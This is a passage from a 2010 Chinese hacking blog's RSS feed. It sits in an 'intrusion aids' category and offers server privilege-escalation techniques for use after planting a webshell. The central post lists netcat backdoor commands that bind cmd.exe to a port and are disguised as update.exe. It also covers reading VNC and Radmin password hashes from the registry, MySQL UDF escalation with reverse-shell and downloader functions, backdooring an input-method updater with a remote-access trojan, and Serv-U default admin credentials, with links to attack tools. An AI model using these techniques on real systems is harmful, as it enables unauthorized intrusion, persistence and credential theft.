+0800</pubDate><guid>http://www.llsilver.com/invasion/360-tiquan-Shell.html</guid><description><![CDATA[<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;前几天360和瑞星互掐，360说瑞星存在本地提权漏洞，瑞星不承认，结果今天被某牛人爆出一个360的本地提权漏洞，本大王坐看360的态度，关本大王鸟事，反正本大王没装360，目前裸奔中。</p><p>在webshell下运行360.exe<br /><br />成功后，3389到服务器，按5下shift，得到一个cmd<br /><span style="position: absolute; display: none" id="attach_4636" onmouseover="showMenu({'ctrlid':this.id,'pos':'13'})"><img alt="360本地提权漏洞" src="http://www.t00ls.net/attachments/month_1002/1002021406aeece7b121a64bea.jpg" /></span></p><p>&nbsp;</p><p>权限只需要guest就可以执行，把exe文件放到可读可写文件夹里面，然后CMD执行就行啦。</p><p>本大王找了几个Shell，均成功提权。</p><p>下载地址：<a target="_blank" href="http://down.qiannao.com/space/file/baiyin/-4e0a-4f20-5206-4eab/-5165-4fb5-8f85-52a9/360-63d0-6743.rar/.page">千脑下载</a></p><p>Copyright © 2008</p><p><a href="http://www.llsilver.com/invasion/360-tiquan-Shell.html" target="_blank">继续阅读《360本地提权(Webshell下用)》的全文内容...</a></p><p>分类: <a href="http://www.llsilver.com/post/invasion.html">入侵辅助</a> | Tags: <a href="http://www.llsilver.com/catalog.asp?tags=360">360</a><a href="http://www.llsilver.com/catalog.asp?tags=%E6%8F%90%E6%9D%83">提权</a><a href="http://www.llsilver.com/catalog.asp?tags=webshell">webshell</a> | <a href="http://www.llsilver.com/invasion/360-tiquan-Shell.html#comment" target="_blank">添加评论</a>(8)</p><h3>相关文章:</h3><ul><li><a href="http://www.llsilver.com/invasion/t00ls-tiquan-zhengli.html" title="t00ls整理的比较有效的提权方法">t00ls整理的比较有效的提权方法</a><span>(2010-2-1 12:31:47)</span></li><li><a href="http://www.llsilver.com/invasion/CityShop-5-5-8-0day.html" title="CityShop v5.5.8 0day注入漏洞（附带：后台获取webshell方法）">CityShop v5.5.8 0day注入漏洞（附带：后台获取webshell方法）</a><span>(2010-1-17 22:33:53)</span></li><li><a href="http://www.llsilver.com/passvirus/419.html" title="过360安全卫士的思路">过360安全卫士的思路</a><span>(2009-11-20 15:56:29)</span></li><li><a href="http://www.llsilver.com/passvirus/hexietaozhuang3.0.html" title="和谐套装3.0,和谐和谐,专门和谐x60,xx2010,xx主动,">和谐套装3.0,和谐和谐,专门和谐x60,xx2010,xx主动,</a><span>(2009-11-12 11:53:35)</span></li><li><a href="http://www.llsilver.com/system/yingxiangjiechi_sharuan_360_dabukai.html" title="又见“映像劫持”（XX杀毒软件打不开、360打不开）">又见“映像劫持”（XX杀毒软件打不开、360打不开）</a><span>(2009-9-12 19:48:32)</span></li></ul>]]></description><category>入侵辅助</category><comments>http://www.llsilver.com/invasion/360-tiquan-Shell.html#comment</comments><wfw:comment>http://www.llsilver.com/</wfw:comment><wfw:commentRss>http://www.llsilver.com/feed.asp?cmt=463</wfw:commentRss><trackback:ping>http://www.llsilver.com/cmd.asp?act=tb&amp;id=463&amp;key=51827e31</trackback:ping></item><item><title>t00ls整理的比较有效的提权方法</title><author>874587@gmail.com (白银时代)</author><link>http://www.llsilver.com/invasion/t00ls-tiquan-zhengli.html</link><pubDate>Mon, 01 Feb 2010 12:31:47 +0800</pubDate><guid>http://www.llsilver.com/invasion/t00ls-tiquan-zhengli.html</guid><description><![CDATA[<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;来源：<span style="color: #3366ff">http://www.t00ls.net/thread-6150-1-1.html</span><br />基本上目前常用的东西全都整理出来了，值得一看。</p><p><span style="color: #ff0000"><strong>No.10 Vnc</strong></span><br />Vnc不少老外都在用，国内用的比较少，但是几率很大。<br />==============<br />VNC提权方法<br />==============<br />利用shell读取vnc保存在注册表中的密文，使用工具VNC4X破解<br />注册表位置：HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password<br />69&nbsp;&nbsp;&nbsp; 45<br />150&nbsp;&nbsp; 96<br />177&nbsp;&nbsp; b1<br />243&nbsp;&nbsp; f3<br />153&nbsp;&nbsp; 99<br />89&nbsp;&nbsp;&nbsp; 59<br />148&nbsp;&nbsp; 94<br />22&nbsp;&nbsp;&nbsp; 16</p><p><span style="color: #ff0000"><strong>No.9 Radmin</strong></span><br />Radmin 是一款很不错的服务器管理无论是远程桌面控制，还是文件传输，速度都很快，很方便。 <br />Radmin 默认端口是4899，无密码。不过服务器注重的是安全，一定会修改默认端口和密码的，端口与密码读取位置：</p><blockquote><p>HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置<br />HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置</p></blockquote><p>以前我们可以用海洋木马所带的功能来读出键值,然后进行转换得到hash值,但是现在有个更方便的东西,把ASP文件传到服务器上,打开可直接读出Radmin的hash和Radmin服务端口! <br />直接读取HASH值的小工具：<a target="_blank" href="http://down.qiannao.com/space/file/baiyin/-4e0a-4f20-5206-4eab/-5165-4fb5-8f85-52a9/radmin-002dhash.rar/.page"><span style="color: #3366ff">千脑下载</span></a></p><p><span style="color: #ff0000"><strong>No.8 PcAnywhere</strong></span><br />PcAnywhere是一款用得很多的远程管理软件，他有一个重大漏洞是保存远程管理员帐号的CIF文件密码，是可以被轻易解密的，如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWHERE 同时保存密码文件的目录是允许我们的IUSER权限访问，我们可以下载这个CIF文件到本地破解，再通过PCANYWHERE从本机登陆服务器。思路简单而明确。<br />Ps:保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWHERE安装在D:\program\文件下下，那么PCANYWHERE的密码文件就保存在D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\文件夹下。</p><p><span style="color: #ff0000"><strong>No.7 搜狗输入法</strong></span><br />不少管理都使用五笔打字，不过还是有少数人喜欢用拼音，智能ABC功能少，没有全拼功能，所以大多都选择了搜狗输入法。<br />搜狗输入法根目录下有一个：PinyinUp.exe 是用来更新词典用的，管理员为了保存词库，有可能会把搜狗输入法安装到D盘，搜狗输入法目录默认是Everyone可读可写，直接捆绑上远控等下次重启就会上线了。</p><p><strong><span style="color: #ff0000">No.6 WinWebMail企业邮局系统 7i24.com</span></strong><br />WinWebMail目录下的web必须设置everyone权限可读可写，不然邮件登陆不上去等等，所以在开始程序里找到WinWebMail快捷方式下下来，看路径，访问 路径\web传shell，访问shell后，权限是system，放远控进启动项，等待下次重启。没有删cmd组建的直接加用户。<br />7i24的web目录也是可写，权限为administrator。</p><p><span style="color: #ff0000"><strong>No.5 NC反弹</strong></span><br />nc的使用实例</p><p>c:\nc.exe -l -p 4455 -d -e cmd.exe 可以很好的隐藏一个NetCat后门。<br />c:\nc.exe -p 4455 -d -L -e cmd.exe 这个命令可以让黑客利用NetCat重新返回系统，直到系统管理员在任务管理器中看见nc.exe在运行，从而发现这个后门，我们一样可以把它做的更加隐蔽。<br />c:\move nc.exe c:\windows\system32\Drivers\update.exe<br />c:\windows\systeme32\drivers\update.exe -p 4455 -d -L -e cmd.exe<br />系统管理员可能把特权附属于一些无害的程序，如update.exe等，黑客也可以隐藏命令行。<br />c:\windows\systme32\drivers\update.exe<br />cmd line: -l -p 4455 -d -L -e cmd.exe</p><blockquote><p>c:\&gt;<br />nc -l - p 80&nbsp; 监听80端口<br />nc -l -p 80 &gt;c:\log.dat&nbsp; 监听80端口，并把信息记录到log.dat中<br />nc -v -l -p 80&nbsp; 监听80端口，并显示端口信息<br />nc -vv -l -p 80 监听80端口，显示更详细的端口信息<br />nc -l -p 80 -t -e cmd.exe监听本地的80端口的入站信息，同时将cmd.exe重定向到80端口，当有人连接的时候，就让</p><p>cmd.exe以telnet的形式应答。当然这个最好用在控制的肉鸡上。<br />nc -v ip port 扫瞄某IP的某个端口<br />nc -v -z ip port-port扫描某IP的端口到某端口<br />nc -v -z -u ip&nbsp; port-port扫描某IP的某UDP端口到某UDP端口</p></blockquote><p>NC下载：<a target="_blank" href="http://down.qiannao.com/space/file/baiyin/-4e0a-4f20-5206-4eab/-5165-4fb5-8f85-52a9/nc.rar/.page"><span style="color: #3366ff">千脑下载</span></a></p><p><span style="color: #ff0000"><strong>No.4 mssql(sa) mysql(root)</strong></span><br />sa 1433对外关闭的话，可以构建注入点。<br />&lt;% <br />strSQLServerName = &quot;服务器ip&quot; <br />strSQLDBUserName = &quot;数据库帐号&quot; <br />strSQLDBPassword = &quot;数据库密码&quot; <br />strSQLDBName = &quot;数据库名称&quot; <br />Set conn = Server.createObject(&quot;ADODB.Connection&quot;)<br />strCon = &quot;Provider=SQLOLEDB.1;Persist Security Info=False;Server=&quot; &amp; strSQLServerName &amp; &quot;;User ID=&quot; &amp; strSQLDBUserName &amp; &quot;;Password=&quot; &amp; strSQLDBPassword &amp; &quot;;Database=&quot; &amp; strSQLDBName &amp; &quot;;&quot;<br />conn.open strCon<br />dim rs,strSQL,id <br />set rs=server.createobject(&quot;ADODB.recordset&quot;) <br />id = request(&quot;id&quot;) <br />strSQL = &quot;select * from ACTLIST where worldid=&quot; &amp; idrs.open strSQL,conn,1,3 <br />rs.close</p><p>root su.php配合udf.dll提权<br />第一步：将PHP文件上传到目标机上，填入你的MYSQL账号经行连接。<br />第二步：连接成功后，导出DLL文件，导出时请勿必注意导出路径（一般情况下对任何目录可写，无需考虑权限问题）。<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 对于MYSQL5.0以上版本，你必须 将DLL导出到目标机器的系统目录(win 或 system32)，否则在下一步操作中你会看到&quot;No paths allowed for shared library&quot;错误。<br />第三步：使用SQL语句创建功能函数。语法：Create Function 函数名（函数名只能为下面列表中的其中之一） returns string soname '导出的DLL路径'；<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 对于MYSQL5.0以上版本，语句中的DLL不允许带全路径，如果你在第二步中已将DLL导出到系统目录，那么你就可以省略路径 而使命令正常执行，否则你将会看到&quot;Can't open shared library&quot;错误。<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 这时你必须将DLL重新导出到系统目录。<br />第四步：正确创建功能函数后，你就可以用SQL语句来使用这些功能了。语法：select 创建的函数名('参数列表')； 每个函数有不同的参数，你可以使用select 创建的函数名('help')；来获得指定函数的参数列表信息。<br />udf.dll功能函数说明：<br />cmdshell 执行cmd;<br />&nbsp;&nbsp; downloader 下载者,到网上下载指定文件并保存到指定目录;<br />&nbsp;&nbsp; open3389 通用开3389终端服务,可指定端口(不改端口无需重启);<br />&nbsp;&nbsp; backshell 反弹Shell;<br />&nbsp;&nbsp; ProcessView 枚举系统进程;<br />&nbsp;&nbsp; KillProcess 终止指定进程;<br />&nbsp;&nbsp; regread 读注册表;<br />&nbsp;&nbsp; regwrite 写注册表;<br />&nbsp;&nbsp; shut 关机,注销,重启;<br />&nbsp;&nbsp; about 说明与帮助函数;<br />SU.PHP下载：<a target="_blank" href="http://down.qiannao.com/space/file/baiyin/-4e0a-4f20-5206-4eab/-5165-4fb5-8f85-52a9/su.rar/.page">千脑下载</a><br />UDF工具：<a target="_blank" href="http://down.qiannao.com/space/file/baiyin/-4e0a-4f20-5206-4eab/-5165-4fb5-8f85-52a9/udf.rar/.page">千脑下载</a></p><p><strong><span style="color: #ff0000">No.3 03Oday</span></strong><br />如果支持Asp.Net组件，传Asp.Net Shell，传cmd(在Asp环境下也成功过，不过介绍上写的必须以Asp.Net运行) <br />使用方法:Churrasco.exe &quot;命令&quot;<br />Churrasco下载地址：<a target="_blank" href="http://down.qiannao.com/space/file/baiyin/-4e0a-4f20-5206-4eab/-5165-4fb5-8f85-52a9/Churrasco.rar/.page">千脑下载</a></p><p><span style="color: #ff0000"><strong>No.2 Serv-u</strong></span><br />漏洞是使用Serv-u本地默认管理端口，以默认管理员登陆新建域和用户来执行命令，Serv-u&gt;3.x版本默认本地管理端口是：43958，默认管理员：LocalAdministrator，默认密码：<strong>#l@$ak#.lk;0@P</strong>，这是集成在Serv-u内部的，可以以Guest权限来进行连接，对Serv-u进行管理。</p><p><strong><span style="color: #ff0000">No.1 Oday</span></strong><br />这个就算了吧，一般人根本弄不到。</p><p>Copyright © 2008</p><p><a href="http://www.llsilver.com/invasion/t00ls-tiquan-zhengli.html" target="_blank">继续阅读《t00ls整理的比较有效的提权方法》的全文内容...</a></p><p>分类: <a href="http://www.llsilver.com/post/invasion.html">入侵辅助</a> | Tags: <a href="http://www.llsilver.com/catalog.asp?tags=%E6%8F%90%E6%9D%83">提权</a> | <a href="http://www.llsilver.com/invasion/t00ls-tiquan-zhengli.html#comment" target="_blank">添加评论</a>(3)</p><h3>相关文章:</h3><ul><li><a href="http://www.llsilver.com/invasion/360-tiquan-Shell.html" title="360本地提权(Webshell下用)">360本地提权(Webshell下用)</a><span>(2010-2-2 16:19:34)</span></li><li><a href="http://www.llsilver.com/invasion/284.html" title="Serv-U FTP Server v8 本地提权">Serv-U FTP Server v8 本地提权</a><span>(2009-8-6 13:11:44)</span></li><li><a href="http://www.llsilver.com/invasion/killabc_webshell.html" title="落雪村提权专用免杀webshell<附源代码>">落雪村提权专用免杀webshell<附源代码></a><span>(2009-2-7 11:32:1)</span></li><li><a href="http://www.llsilver.com/invasion/7.html" title="两个Servu的提权EXP">两个Servu的提权EXP</a><span>(2009-2-2 15:59:29)</span></li></ul>]]></description><category>入侵辅助</category><comments>http://www.llsilver.com/invasion/t00ls-tiquan-zhengli.html#comment</comments><wfw:comment>http://www.llsilver.com/</wfw:comment><wfw:commentRss>http://www.llsilver.com/feed.asp?cmt=462</wfw:commentRss><trackback:ping>http://www.llsilver.com/cmd.asp?act=tb&amp;id=462&amp;key=37845c47</trackback:ping></item><item><title>送几个iiscan的邀请码</title><author>874587@gmail.com (白银时代)</author><link>http://www.llsilver.com/invasion/iiscan-yaoqingma.html</link><pubDate>Sat, 30 Jan 2010 13:06:33 +0800</pubDate><guid>http://www.llsilver.com/invasion/iiscan-yaoqingma.html</guid><description><![CDATA[<p><span style="color: #ff0000"><strong>已全部送完，需要的朋友只能再等一段时间了，有的话我会继续发帖送，老规矩，一次5个。<br />留言区中留下信箱就可以。</strong></span></p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;网址：<span style="color: #3366ff">http://www.iiscan.com/<br /></span>因为今天下午去同学家，就发这个算作是今天的更新吧。</p><p>不知道是干什么用的兄弟姐妹们就不要索求了，不知道就代表你们用不到。</p><p>需要的人直接留下信箱就OK。只有5个，先到先得。取前5个回复的信箱。</p><p>回帖时看看前面几个留言了，如果已经有5个信箱出现就不要留了，因为只有5个。</p><p>&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;</p><p><span style="color: #ff0000"><strong>拿到邀请码注册的兄弟姐妹们请自觉共享邀请码，每个账户激活之后都可以免费获得5个邀请码。</strong></span></p><p><span style="color: #ff0000"><strong>请自觉公布。</strong></span></p><p>&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;</p><p>还是说一下IISCAN是干嘛的吧：就是你注册一个账号，然后在后台按照他的提示来进行网站验证，验证通过之后IISCAN会自动帮你检测网站漏洞，然后以PDF或者网页的形式列举出网站的漏洞信息。</p><p>据本大王使用得出的经验，一般结果会在3天以内出来，如果站点很大的话时间会比较长。</p><p>Copyright © 2008</p><p><a href="http://www.llsilver.com/invasion/iiscan-yaoqingma.html" target="_blank">继续阅读《送几个iiscan的邀请码》的全文内容...</a></p><p>分类: <a href="http://www.llsilver.com/post/invasion.html">入侵辅助</a> | Tags: <a href="http://www.llsilver.com/catalog.asp?tags=%E9%9A%8F%E7%AC%94">随笔</a><a href="http://www.llsilver.com/catalog.asp?tags=iiscan">iiscan</a><a href="http://www.llsilver.com/catalog.asp?tags=%E9%82%80%E8%AF%B7%E7%A0%81">邀请码</a> | <a href="http://www.llsilver.com/invasion/iiscan-yaoqingma.html#comment" target="_blank">添加评论</a>(7)</p><h3>相关文章:</h3><ul><li><a href="http://www.llsilver.com/mood/465.html" title="新年快乐">新年快乐</a><span>(2010-2-13 10:3:10)</span></li><li><a href="http://www.llsilver.com/mood/457.html" title="博客、白银时代、百度，瞎写点东西">博客、白银时代、百度，瞎写点东西</a><span>(2010-1-22 22:37:3)</span></li><li><a href="http://www.llsilver.com/mood/aile-vpn-laji.html" title="爱乐VPN，本大王用过的最垃圾、最烂、最差、态度最恶劣的收费VPN">爱乐VPN，本大王用过的最垃圾、最烂、最差、态度最恶劣的收费VPN</a><span>(2010-1-19 22:42:24)</span></li><li><a href="http://www.llsilver.com/mood/428.html" title="本大王回来了">本大王回来了</a><span>(2009-12-19 23:8:18)</span></li><li><a href="http://www.llsilver.com/mood/423.html" title="想把域名解析到新的二级域名下面。">想把域名解析到新的二级域名下面。</a><span>(2009-11-29 20:20:16)</span></li></ul>]]></description><category>入侵辅助</category><comments>http://www.llsilver.com/invasion/iiscan-yaoqingma.html#comment</comments><wfw:comment>http://www.llsilver.com/</wfw:comment><wfw:commentRss>http://www.llsilver.com/feed.asp?cmt=461</wfw:commentRss><trackback:ping>http://www.llsilver.com/cmd.asp?act=tb&amp;id=461&amp;key=a7831aae</trackback:ping></item></channel></rss>
